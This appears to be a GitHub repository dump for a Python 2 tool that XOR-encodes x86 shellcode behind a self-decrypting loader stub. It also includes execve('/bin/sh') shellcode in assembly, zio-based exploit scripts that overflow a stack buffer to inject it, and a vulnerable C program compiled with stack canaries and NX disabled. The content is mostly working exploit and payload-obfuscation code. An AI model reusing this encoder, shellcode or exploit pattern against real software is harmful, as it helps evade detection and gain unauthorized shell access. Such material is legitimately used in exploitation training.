├── README.md
├── ShellcodeEncrypter.py
├── encrypted_shellcode.dat
├── example
│   ├── encrypted
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── encrypted_shellcode.dat
│   │   ├── exploit.py
│   │   ├── shellcode
│   │   ├── shellcode.asm
│   │   ├── shellcode.o
│   │   └── vulnerable
│   ├── normal
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── exploit.py
│   │   ├── shellcode
│   │   ├── shellcode.asm
│   │   ├── shellcode.dat
│   │   ├── shellcode.o
│   │   └── vulnerable
│   └── vulnerable
│       ├── Makefile
│       ├── README.md
│       ├── vulnerable
│       └── vulnerable.c
└── shellcode.dat

/README.md:
--------------------------------------------------------------------------------
Introduction:
```
shellcode encryption tool
```
Usage:
```
python ShellcodeEncrypter.py [SHELLCODE_FILE] [PASSWORD]
```
How it works:
```
1. Read the shellcode
2. XOR every byte of the shellcode with the password the user entered
3. Build a loader for the shellcode
4. Write the new shellcode to a new file
```
Notes:
```
1. The password can only be a number in the range 0 - 255
```
Reference code:
```
global _start
; this shellcode XORs every byte of the 'encrypt' segment, then executes it
; password is 0xe9 = 233
_start:
    jmp jocker
loader:
    pop esi             ; get address of encrypted shellcode (pushed by the call below)
    xor ecx, ecx
    mov cl, 21          ; loop count (length of the encrypted shellcode)
decrypt:
    mov al, [esi]
    xor al, 0e9H
    mov [esi], al
    inc esi
    loop decrypt
    jmp encrypt         ; decrypted in place, now run it

jocker:
    call loader         ; pushes the address of 'encrypt' as the return address
encrypt:                ; 21 bytes, each one original byte XOR 0xe9
    db 0d8H
    db 20H
    db 0b8H
    db 81H
    db 0c6H
    db 0c6H
    db 9aH
    db 81H
    db 81H
    db 0c6H
    db 8bH
    db 80H
    db 87H
    db 60H
    db 0aH
    db 83H
    db 0e2H
    db 0b1H
    db 70H
    db 24H
    db 69H
```

--------------------------------------------------------------------------------
/ShellcodeEncrypter.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
# coding:utf-8
# Python 2 script (print statements, str used as a byte string)

import os
import sys
import binascii


def encrypt(shellcode, password):
    # XOR every byte of the shellcode with the single-byte password
    result = ""
    for i in shellcode:
        result += chr(ord(i) ^ password)
    return result


def build(shellcode, password):
    # Prepend the 23-byte x86 loader stub shown in README.md:
    #   jmp jocker / pop esi / xor ecx,ecx / mov cl,<length> /
    #   decrypt loop (mov al,[esi]; xor al,<password>; mov [esi],al; inc esi; loop) /
    #   jmp encrypt / call loader
    # The length byte and the XOR key byte are patched into the stub.
    length = len(shellcode)
    result = "\xeb\x10\x5e\x31\xc9\xb1" + chr(length) + "\x8a\x06\x34" + chr(password) + "\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff"
    result += shellcode
    return result


def main():
    if len(sys.argv) != 3:
        print "Usage : "
        print "    python ShellcodeEncrypter.py [SHELLCODE_FILE] [PASSWORD]"
        print "TIPS : "
        print "    1. password must be a number between 0 and 255"
        print "CONTACT : "
        print "    If you have any questions, please contact me : [wangyihanger@gmail.com]"
        sys.exit(1)
    filename = sys.argv[1]
    try:
        shellcode_file = open(filename, "rb")
        shellcode = shellcode_file.read()
        shellcode_file.close()
    except IOError:
        print "Open [SHELLCODE_FILE] failed."
        sys.exit(2)
    # The loader keeps the length in cl, so the payload can be at most 0xFF bytes
    if len(shellcode) > 0xFF:
        print "[ERROR] : The shellcode is too long."
        sys.exit(3)
    # Reduce to one byte so the key fits the imm8 of 'xor al, imm8' (0 leaves the bytes unchanged)
    password = int(sys.argv[2], 10) % 256
    print "[SHELLCODE] : " + binascii.b2a_hex(shellcode)
    print "[PASSWORD] : " + str(password)
    encrypted_shellcode = encrypt(shellcode, password)
    result = build(encrypted_shellcode, password)
    print "[ENCRYPTED] : " + binascii.b2a_hex(result)
    # Write next to the input file, prefixing only the base name
    out_name = os.path.join(os.path.dirname(filename), "encrypted_" + os.path.basename(filename))
    result_file = open(out_name, "wb")
    result_file.write(result)
    result_file.close()
    print "[%s] Saved!" % (out_name)


if __name__ == "__main__":
    main()
```

--------------------------------------------------------------------------------
/encrypted_shellcode.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/encrypted_shellcode.dat

--------------------------------------------------------------------------------
/example/encrypted/Makefile:
--------------------------------------------------------------------------------
```makefile
shellcode: shellcode.o
	ld -o shellcode shellcode.o
shellcode.o:
	nasm -f elf shellcode.asm
clean:
	rm ./shellcode.o
	rm ./shellcode
```

--------------------------------------------------------------------------------
/example/encrypted/README.md:
--------------------------------------------------------------------------------
Introduction:
```
Overflow the vulnerable program with the encrypted shellcode
```
Environment:
```
Linux_x86
```

--------------------------------------------------------------------------------
/example/encrypted/encrypted_shellcode.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/encrypted_shellcode.dat

--------------------------------------------------------------------------------
/example/encrypted/exploit.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
# coding:utf-8

from zio import *
import binascii

# objdump -d shellcode (not working)
with open("./encrypted_shellcode.dat", "r") as f:
    shellcode = f.read()

Io = zio("../vulnerable/vulnerable")

# python -c 'print "A" * 8 + "BBBBCCCCDDDD" + "@@@@"' | ./vulnerable
junk = "A" * 8
fake = "BBBBCCCCDDDD"
nop = "\x90" * 16

address = l32(int(Io.readline()[2:10], 16) + len(junk) + len(fake) + 8)
payload = junk + fake + address + nop + shellcode

Io.write(payload)
Io.interact()
```

--------------------------------------------------------------------------------
/example/encrypted/shellcode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/shellcode

--------------------------------------------------------------------------------
/example/encrypted/shellcode.asm:
--------------------------------------------------------------------------------
```nasm
; section .data
;     string db '/bin//sh'
; section .text
global _start
_start:
    jmp two
; setuid
; no need to obtain root privileges for now
;    xor eax, eax
;    mov al, 0d5H
;    xor ebx, ebx
;    int 80H
; execve
one:
    pop ebx             ; get address of "/bin/sh"
    mov al, 0BH         ; execve; relies on the upper bytes of eax already being zero
    xor ecx, ecx
    xor edx, edx
    int 80H
; exit
; our goal is to get a shell; we do not care whether the program exits cleanly
;    mov eax, 1
;    mov ebx, 0
;    int 80H
two:
    call one            ; push address of "/bin/sh", jmp one
    db '/bin/sh',0
```

--------------------------------------------------------------------------------
/example/encrypted/shellcode.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/shellcode.o

--------------------------------------------------------------------------------
/example/encrypted/vulnerable:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/vulnerable

--------------------------------------------------------------------------------
/example/normal/Makefile:
--------------------------------------------------------------------------------
```makefile
shellcode: shellcode.o
	ld -o shellcode shellcode.o
shellcode.o:
	nasm -f elf shellcode.asm
clean:
	rm ./shellcode.o
	rm ./shellcode
```

--------------------------------------------------------------------------------
/example/normal/README.md:
--------------------------------------------------------------------------------
Introduction:
```
Unencrypted shellcode
```
Environment:
```
Linux_x86
```

--------------------------------------------------------------------------------
/example/normal/exploit.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
# coding:utf-8

from zio import *
import binascii

# objdump -d shellcode (not working)
with open("./shellcode.dat", "r") as f:
    shellcode = f.read()

Io = zio("../vulnerable/vulnerable")

# python -c 'print "A" * 8 + "BBBBCCCCDDDD" + "@@@@"' | ./vulnerable
junk = "A" * 8
fake = "BBBBCCCCDDDD"
nop = "\x90" * 16

address = l32(int(Io.readline()[2:10], 16) + len(junk) + len(fake) + 8)
payload = junk + fake + address + nop + shellcode

Io.write(payload)
Io.interact()
```

--------------------------------------------------------------------------------
/example/normal/shellcode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/shellcode

--------------------------------------------------------------------------------
/example/normal/shellcode.asm:
--------------------------------------------------------------------------------
```nasm
; section .data
;     string db '/bin//sh'
; section .text
global _start
_start:
    jmp two
; setuid
; no need to obtain root privileges for now
;    xor eax, eax
;    mov al, 0d5H
;    xor ebx, ebx
;    int 80H
; execve
one:
    pop ebx             ; get address of "/bin/sh"
    mov al, 0BH         ; execve; relies on the upper bytes of eax already being zero
    xor ecx, ecx
    xor edx, edx
    int 80H
; exit
; our goal is to get a shell; we do not care whether the program exits cleanly
;    mov eax, 1
;    mov ebx, 0
;    int 80H
two:
    call one            ; push address of "/bin/sh", jmp one
    db '/bin/sh',0
```

--------------------------------------------------------------------------------
/example/normal/shellcode.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/shellcode.dat

--------------------------------------------------------------------------------
/example/normal/shellcode.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/shellcode.o

--------------------------------------------------------------------------------
/example/normal/vulnerable:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/vulnerable

--------------------------------------------------------------------------------
/example/vulnerable/Makefile:
--------------------------------------------------------------------------------
```makefile
vulnerable: vulnerable.c
	# stack canaries and NX are switched off on purpose so the injected shellcode can run from the stack
	gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
clean:
	rm ./vulnerable
```

--------------------------------------------------------------------------------
/example/vulnerable/README.md:
--------------------------------------------------------------------------------
Introduction:
```
This program has a buffer overflow vulnerability; shellcode can be injected to execute execve("/bin/sh")
This program is used to verify that the shellcode works
```

--------------------------------------------------------------------------------
/example/vulnerable/vulnerable:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/vulnerable/vulnerable

--------------------------------------------------------------------------------
/example/vulnerable/vulnerable.c:
--------------------------------------------------------------------------------
```c
#include <stdio.h>
#include <unistd.h>

int main(){
    char buffer[8];
    printf("%p\n", &buffer);   /* prints the buffer address so the test exploit can find it */
    read(0, buffer, 0xFF);     /* deliberately unbounded read into an 8-byte buffer */
}
```

--------------------------------------------------------------------------------
/shellcode.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/shellcode.dat
--------------------------------------------------------------------------------